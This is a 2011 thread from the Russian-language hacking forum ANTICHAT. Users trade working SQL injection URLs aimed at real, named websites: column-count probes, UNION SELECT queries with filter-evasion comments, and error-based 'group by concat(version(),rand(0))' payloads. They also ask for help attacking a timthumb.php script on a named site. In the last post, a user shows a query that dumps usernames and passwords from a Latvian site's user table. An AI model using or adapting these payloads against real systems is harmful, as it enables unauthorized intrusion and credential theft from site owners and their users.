ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.12.2011, 20:59
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от stan0009
stan0009 said:
Товарищи! Нужна ваша помощь!
короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
подскажите вид уязвимости^^
а далее сам чего нибудь накручу
если не получится то конешно отдам вам на растерзание))
/thread12123-including.html
/thread232773.html
но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.
|
|
|
05.12.2011, 21:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
Shows "Unknown column '4' in 'order clause'
Код:
Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.
Код:
Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
Код:
Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
Nothing works! |
|
|
|
05.12.2011, 22:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+
Shows "Unknown column '4' in 'order clause'
Код:
Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+
Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.
Код:
Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!
Код:
Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+
Nothing works! http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version (),rand(0)|0)+%0A+having+%0A+min(0)--+
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(), rand(0)|0)+having+min(0)--+
|
|
|
|
06.12.2011, 20:15
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
Провел на форуме:
415091
Репутация:
5
|
|
Что с этим можно сделать ?
Код:
Code:
http://???????.com/wp-content/themes/rttheme9/timthumb.php
|
|
|
|
06.12.2011, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Гуглится легко:
/showpost.php?p=2792868&postcount=170
|
|
|
|
06.12.2011, 20:25
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
Провел на форуме:
415091
Репутация:
5
|
|
Сообщение от Ereee
Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170
Большое спасибо !
|
|
|
|
06.12.2011, 20:54
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
Провел на форуме:
415091
Репутация:
5
|
|
Что-то не получается, прошу помощи
Код:
Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
|
|
|
|
06.12.2011, 21:36
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от XAOCX
XAOCX said:
Что-то не получается, прошу помощи
Код:
Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php
Это не уязвимость
|
|
|
|
06.12.2011, 21:37
|
|
Познающий
Регистрация: 19.12.2008
Сообщений: 41
Провел на форуме:
415091
Репутация:
5
|
|
Сообщение от aydin-ka
aydin-ka said:
Это не уязвимость
А как же это ?
Сообщение от Ereee
Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170
|
|
|
|
06.12.2011, 23:06
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
нашел скулю на сайте и при выводе пароля пишет такую лабуду
skankjo:�{�o��
сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
Сообщение от None
=3+and+1=0+Union+Select%20+1,UNHEX%28HEX%28concat_ ws%280x3a,username,password%29%29%29%20,3,4,5,6+fr om+tbl_users+limit+3,3%20--
сам запрос |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
